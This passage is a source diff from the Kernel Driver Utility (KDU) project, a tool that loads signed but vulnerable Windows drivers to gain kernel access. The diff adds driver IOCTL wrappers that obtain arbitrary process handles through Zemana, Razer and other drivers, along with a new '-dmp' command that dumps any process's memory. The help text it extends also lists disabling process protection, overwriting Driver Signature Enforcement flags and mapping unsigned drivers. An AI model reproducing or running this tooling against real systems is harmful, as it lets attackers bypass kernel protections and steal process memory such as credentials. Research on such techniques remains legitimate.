- _In_ PVOID Buffer,
- _In_ ULONG NumberOfBytes);
-
-BOOL WINAPI RazerWritePhysicalMemory(
+BOOL WINAPI RazerOpenProcess(
_In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes);
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/zemana.cpp b/Source/Hamakaze/idrv/zemana.cpp
index beef4b7..869cdc9 100644
--- a/Source/Hamakaze/idrv/zemana.cpp
+++ b/Source/Hamakaze/idrv/zemana.cpp
@@ -4,9 +4,9 @@
*
* TITLE: ZEMANA.CPP
*
-* VERSION: 1.30
+* VERSION: 1.40
*
-* DATE: 20 Mar 2023
+* DATE: 20 Oct 2023
*
* Zemana driver routines.
*
@@ -524,6 +524,32 @@ BOOL ZmControlDSE(
return bResult;
}
+/*
+* ZmOpenProcess
+*
+* Purpose:
+*
+* Open process via Zemana driver.
+*
+*/
+BOOL WINAPI ZmOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
+ *ProcessHandle = NULL;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_ZEMANA_OPEN_PROCESS,
+ &ProcessId,
+ sizeof(ProcessId),
+ ProcessHandle,
+ sizeof(ProcessHandle));
+}
+
/*
* ZmRegisterDriver
*
diff --git a/Source/Hamakaze/idrv/zemana.h b/Source/Hamakaze/idrv/zemana.h
index 8d2bdc2..8403499 100644
--- a/Source/Hamakaze/idrv/zemana.h
+++ b/Source/Hamakaze/idrv/zemana.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: ZEMANA.H
*
-* VERSION: 1.27
+* VERSION: 1.40
*
-* DATE: 08 Nov 2022
+* DATE: 20 Oct 2023
*
* Zemana driver interface header.
*
@@ -34,6 +34,7 @@
#define ZEMANA_SCSI_WRITE (DWORD)0x806
#define ZEMANA_PROTECT_REGISTRY (DWORD)0x810
#define ZEMANA_SAVE_MINIPORT_FIX (DWORD)0x811
+#define ZEMANA_OPEN_PROCESS (DWORD)0x813
#define IOCTL_ZEMANA_REGISTER_PROCESS \
CTL_CODE(FILE_DEVICE_ZEMANA, ZEMANA_REGISTER_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80002010
@@ -50,6 +51,9 @@
#define IOCTL_ZEMANA_PROTECT_REGISTRY \
CTL_CODE(FILE_DEVICE_ZEMANA, ZEMANA_PROTECT_REGISTRY, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80002040
+#define IOCTL_ZEMANA_OPEN_PROCESS \
+ CTL_CODE(FILE_DEVICE_ZEMANA, ZEMANA_OPEN_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x8000204C
+
BOOL ZmMapDriver(
_In_ PKDU_CONTEXT Context,
_In_ PVOID ImageBase);
@@ -59,6 +63,12 @@ BOOL ZmControlDSE(
_In_ ULONG DSEValue,
_In_ ULONG_PTR Address);
+BOOL WINAPI ZmOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
+
BOOL WINAPI ZmRegisterDriver(
_In_ HANDLE DeviceHandle,
_In_opt_ PVOID Param);
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index 0d5227d..3f4ef19 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -4,9 +4,9 @@
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Providers global list.
*
@@ -45,6 +45,8 @@
#include "idrv/zodiacon.h"
#include "idrv/echodrv.h"
#include "idrv/nvidia.h"
+#include "idrv/binalyze.h"
+#include "idrv/rzpnk.h"
//
// Victims public array.
@@ -108,7 +110,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -132,7 +136,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -156,7 +162,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)MapMemReadPhysicalMemory,
(provWritePhysicalMemory)MapMemWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -180,7 +188,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)AtszioReadPhysicalMemory,
(provWritePhysicalMemory)AtszioWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -204,7 +214,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -228,7 +240,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -252,7 +266,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -276,7 +292,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WRZeroReadPhysicalMemory,
(provWritePhysicalMemory)WRZeroWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -300,7 +318,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -324,7 +344,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -348,7 +370,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)PhyMemReadPhysicalMemory,
(provWritePhysicalMemory)PhyMemWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -372,7 +396,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -396,7 +422,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)LHAReadPhysicalMemory,
(provWritePhysicalMemory)LHAWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -420,7 +448,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -444,7 +474,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)DI64ReadPhysicalMemory,
(provWritePhysicalMemory)DI64WritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -468,7 +500,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -492,7 +526,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -516,7 +552,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -540,7 +578,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)KphReadPhysicalMemory,
(provWritePhysicalMemory)KphWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)KphOpenProcess
},
{
@@ -564,7 +604,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)PexReadPhysicalMemory,
(provWritePhysicalMemory)PexWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)PexOpenProcess
},
{
@@ -588,7 +630,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -612,7 +656,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)DbkOpenProcess
},
{
@@ -636,7 +682,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -660,7 +708,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)HwReadPhysicalMemory,
(provWritePhysicalMemory)HwWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -684,7 +734,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)MapMemReadPhysicalMemory,
(provWritePhysicalMemory)MapMemWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -708,7 +760,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)ZmOpenProcess
},
{
@@ -732,7 +786,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -756,7 +812,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)DI64ReadPhysicalMemory,
(provWritePhysicalMemory)DI64WritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -780,7 +838,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)AsrReadPhysicalMemory,
(provWritePhysicalMemory)AsrWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -804,7 +864,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)AlcReadPhysicalMemory,
(provWritePhysicalMemory)AlcWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -828,7 +890,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)RmReadPhysicalMemory,
(provWritePhysicalMemory)RmWritePhysicalMemory,
- (provValidatePrerequisites)RmValidatePrerequisites
+ (provValidatePrerequisites)RmValidatePrerequisites,
+
+ (provOpenProcess)NULL
},
{
@@ -852,7 +916,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)PhmReadPhysicalMemory,
(provWritePhysicalMemory)PhmWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -876,7 +942,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)LddReadWritePhysicalMemoryStub,
(provWritePhysicalMemory)LddReadWritePhysicalMemoryStub,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -900,7 +968,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)DpdReadPhysicalMemory,
(provWritePhysicalMemory)DpdWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -924,7 +994,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)WinIoReadPhysicalMemory,
(provWritePhysicalMemory)WinIoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -948,7 +1020,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -972,7 +1046,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -996,7 +1072,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)ZdcReadPhysicalMemory,
(provWritePhysicalMemory)ZdcWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -1020,7 +1098,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)ZdcReadPhysicalMemory,
(provWritePhysicalMemory)ZdcWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
},
{
@@ -1044,7 +1124,9 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)EchoDrvOpenProcess
},
{
@@ -1068,6 +1150,88 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NvoReadPhysicalMemory,
(provWritePhysicalMemory)NvoWritePhysicalMemory,
- (provValidatePrerequisites)NULL
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)NULL,
+ (provControlDSE)NULL,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)NULL,
+ (provWritePhysicalMemory)NULL,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)BeDrvOpenProcess
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)KDUProviderPostOpen,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE2,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)WRZeroReadPhysicalMemory,
+ (provWritePhysicalMemory)WRZeroWritePhysicalMemory,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)NULL
+ },
+
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)NULL,
+ (provControlDSE)NULL,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)NULL,
+ (provWritePhysicalMemory)NULL,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)RazerOpenProcess
}
+
};
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 5dfa808..6e02f10 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -4,9 +4,9 @@
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.31
+* VERSION: 1.40
*
-* DATE: 09 Apr 2023
+* DATE: 21 Oct 2023
*
* Vulnerable drivers provider abstraction layer.
*
@@ -189,42 +189,48 @@ VOID KDUProvList()
//
// List provider flags.
//
+ if (provData->Flags)
+ printf_s("\tProvider capabilities: \r\n");
+
if (provData->SignatureWHQL)
- printf_s("\tDriver is WHQL signed\r\n");
+ printf_s("\t->Driver is WHQL signed.\r\n");
//
// Some Realtek drivers are digitally signed
// after binary modification with wrong PE checksum as result.
// Note: Windows 7 will not allow their load.
//
if (provData->IgnoreChecksum)
- printf_s("\tIgnore invalid image checksum\r\n");
+ printf_s("\t->Ignore invalid image checksum.\r\n");
//
// Some BIOS flashing drivers does not support unload.
//
if (provData->NoUnloadSupported)
- printf_s("\tDriver does not support unload procedure\r\n");
+ printf_s("\t->Driver does not support unload procedure.\r\n");
if (provData->PML4FromLowStub)
- printf_s("\tVirtual to physical addresses translation require PML4 query from low stub\r\n");
+ printf_s("\t->Virtual to physical addresses translation require PML4 query from low stub.\r\n");
if (provData->NoVictim)
- printf_s("\tNo victim required\r\n");
+ printf_s("\t->No victim required.\r\n");
if (provData->PhysMemoryBruteForce)
- printf_s("\tProvider supports only physical memory brute-force.\r\n");
+ printf_s("\t->Provider supports only physical memory brute-force.\r\n");
if (provData->PreferPhysical)
- printf_s("\tPhysical memory access is preferred.\r\n");
+ printf_s("\t->Physical memory access is preferred.\r\n");
if (provData->PreferVirtual)
- printf_s("\tVirtual memory access is preferred.\r\n");
+ printf_s("\t->Virtual memory access is preferred.\r\n");
if (provData->CompanionRequired)
- printf_s("\tProvider expects companion to be loaded.\r\n");
+ printf_s("\t->Provider expects companion to be loaded.\r\n");
if (provData->UseSymbols)
- printf_s("\tMS symbols are required to query internal information.\r\n");
+ printf_s("\t->MS symbols are required to query internal information.\r\n");
+
+ if (provData->OpenProcessSupported)
+ printf_s("\t->Driver can be used to open a handle for the specified process.\r\n");
//
// List "based" flags.
@@ -725,6 +731,40 @@ BOOL WINAPI KDUWriteKernelVM(
return bResult;
}
+/*
+* KDUOpenProcess
+*
+* Purpose:
+*
+* Provider wrapper for OpenProcess routine.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI KDUOpenProcess(
+ _In_ struct _KDU_CONTEXT* Context,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle
+)
+{
+ BOOL bResult = FALSE;
+ KDU_PROVIDER* prov = Context->Provider;
+
+ __try {
+
+ bResult = prov->Callbacks.OpenProcess(Context->DeviceHandle,
+ ProcessId,
+ DesiredAccess,
+ ProcessHandle);
+
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ SetLastError(GetExceptionCode());
+ return FALSE;
+ }
+ return bResult;
+}
+
/*
* KDUProviderLoadDB
*
@@ -844,6 +884,18 @@ BOOL KDUProviderVerifyActionType(
break;
+ case ActionTypeDumpProcess:
+
+ if (Provider->Callbacks.OpenProcess == NULL) {
+
+ supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary process handle acquisition or\r\n"\
+ "\tKDU interface is not implemented for this method.\r\n");
+ return FALSE;
+
+ }
+
+ break;
+
default:
break;
}
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 255d4ff..1e98be7 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -4,9 +4,9 @@
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.30
+* VERSION: 1.40
*
-* DATE: 20 Mar 2023
+* DATE: 21 Oct 2023
*
* Provider support routines.
*
@@ -136,11 +136,22 @@ typedef BOOL(WINAPI* provValidatePrerequisites)(
_In_ struct _KDU_CONTEXT* Context
);
+//
+// Prototype for process handle acquisition.
+//
+typedef BOOL(WINAPI* provOpenProcess)(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle
+ );
+
typedef enum _KDU_ACTION_TYPE {
ActionTypeMapDriver = 0,
- ActionTypeDKOM = 1,
- ActionTypeDSECorruption = 2,
- ActionTypeUnspecified = 3,
+ ActionTypeDKOM,
+ ActionTypeDSECorruption,
+ ActionTypeDumpProcess,
+ ActionTypeUnspecified,
ActionTypeMax
} KDU_ACTION_TYPE;
@@ -173,6 +184,8 @@ typedef struct _KDU_PROVIDER {
provValidatePrerequisites ValidatePrerequisites; //optional
+ provOpenProcess OpenProcess; //optional
+
} Callbacks;
} KDU_PROVIDER, * PKDU_PROVIDER;
@@ -256,6 +269,13 @@ BOOL WINAPI KDUWriteKernelVM(
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+_Success_(return != FALSE)
+BOOL WINAPI KDUOpenProcess(
+ _In_ struct _KDU_CONTEXT* Context,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
+
BOOL WINAPI KDUProviderStub(
VOID);
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index 855cb31..d9481ef 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 20 Oct 2023
*
* Hamakaze main logic and entrypoint.
*
@@ -24,6 +24,7 @@
#define CMD_SCV L"-scv"
#define CMD_PS L"-ps"
#define CMD_PSE L"-pse"
+#define CMD_DMP L"-dmp"
#define CMD_DSE L"-dse"
#define CMD_LIST L"-list"
#define CMD_SI L"-diag"
@@ -40,6 +41,7 @@
"kdu -diag - Run system diagnostic for troubleshooting\r\n"\
"kdu -prv id - Optional, sets provider id to be used with rest of commands, default 0\r\n"\
"kdu -pse cmdline - Launch program as PPL\r\n"\
+ "kdu -dmp pid - Dump virtual memory of the given process\r\n"\
"kdu -ps pid - Disable ProtectedProcess for given pid\r\n"\
"kdu -dse value - Write user defined value to the system DSE state flags\r\n"\
"kdu -map filename - Map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\
@@ -49,6 +51,37 @@
#define T_PRNTDEFAULT "%s\r\n"
+/*
+* KDUProcessDmpSwitch
+*
+* Purpose:
+*
+* Handle -dmp switch.
+*
+*/
+INT KDUProcessDmpSwitch(
+ _In_ ULONG HvciEnabled,
+ _In_ ULONG NtBuildNumber,
+ _In_ ULONG ProviderId,
+ _In_ HANDLE ProcessId)
+{
+ INT retVal = 0;
+ KDU_CONTEXT* provContext;
+
+ provContext = KDUProviderCreate(ProviderId,
+ HvciEnabled,
+ NtBuildNumber,
+ KDU_SHELLCODE_NONE,
+ ActionTypeDumpProcess);
+
+ if (provContext) {
+ retVal = KDUDumpProcessMemory(provContext, ProcessId);
+ KDUProviderRelease(provContext);
+ }
+
+ return retVal;
+}
+
/*
* KDUProcessPSEObjectSwitch
*
@@ -370,7 +403,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_PRV,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
providerId = _strtoul(szParameter);
@@ -399,7 +432,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_DSE,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
dseValue = _strtoul(szParameter);
@@ -416,7 +449,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_MAP,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
¶mLength))
{
if (paramLength == 0) {
@@ -435,7 +468,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_SCV,
TRUE,
szExtraParameter,
- sizeof(szExtraParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szExtraParameter),
NULL))
{
shellVersion = _strtoul(szExtraParameter);
@@ -460,7 +493,7 @@ INT KDUProcessCommandLine(
supGetCommandLineOption(CMD_DRVNAME,
TRUE,
szDriverName,
- sizeof(szDriverName) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szDriverName),
¶mLength);
lpParam1 = (paramLength != 0) ? szDriverName : NULL;
@@ -470,7 +503,7 @@ INT KDUProcessCommandLine(
supGetCommandLineOption(CMD_DRVREG,
TRUE,
szDriverRegPath,
- sizeof(szDriverRegPath) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szDriverRegPath),
¶mLength);
lpParam2 = (paramLength != 0) ? szDriverRegPath : NULL;
@@ -494,7 +527,7 @@ INT KDUProcessCommandLine(
if (supGetCommandLineOption(CMD_PS,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
processId = strtou64(szParameter);
@@ -508,7 +541,7 @@ INT KDUProcessCommandLine(
else if (supGetCommandLineOption(CMD_PSE,
TRUE,
szParameter,
- sizeof(szParameter) / sizeof(WCHAR),
+ RTL_NUMBER_OF(szParameter),
NULL))
{
retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
@@ -517,6 +550,20 @@ INT KDUProcessCommandLine(
szParameter);
}
+ else if (supGetCommandLineOption(CMD_DMP,
+ TRUE,
+ szParameter,
+ RTL_NUMBER_OF(szParameter),
+ NULL))
+ {
+ processId = strtou64(szParameter);
+
+ retVal = KDUProcessDmpSwitch(HvciEnabled,
+ NtBuildNumber,
+ providerId,
+ (HANDLE)processId);
+ }
+
else {
//
// Nothing set, show help.
@@ -664,13 +711,14 @@ VOID KDUIntroBanner()
{
IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress);
- printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2023 KDU Project\r\n"\
+ printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - %lu KDU Project\r\n"\
"[#] Built at %s, header checksum 0x%lX\r\n"\
"[#] Supported x64 OS : Windows 7 and above\r\n",
KDU_VERSION_MAJOR,
KDU_VERSION_MINOR,
KDU_VERSION_REVISION,
KDU_VERSION_BUILD,
+ KDU_COPYRIGHT_YEAR,
__TIMESTAMP__,
ntHeaders->OptionalHeader.CheckSum);
}
diff --git a/Source/Hamakaze/ps.cpp b/Source/Hamakaze/ps.cpp
index 5664c1c..5bf0a5c 100644
--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PS.CPP
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 20 Oct 2023
*
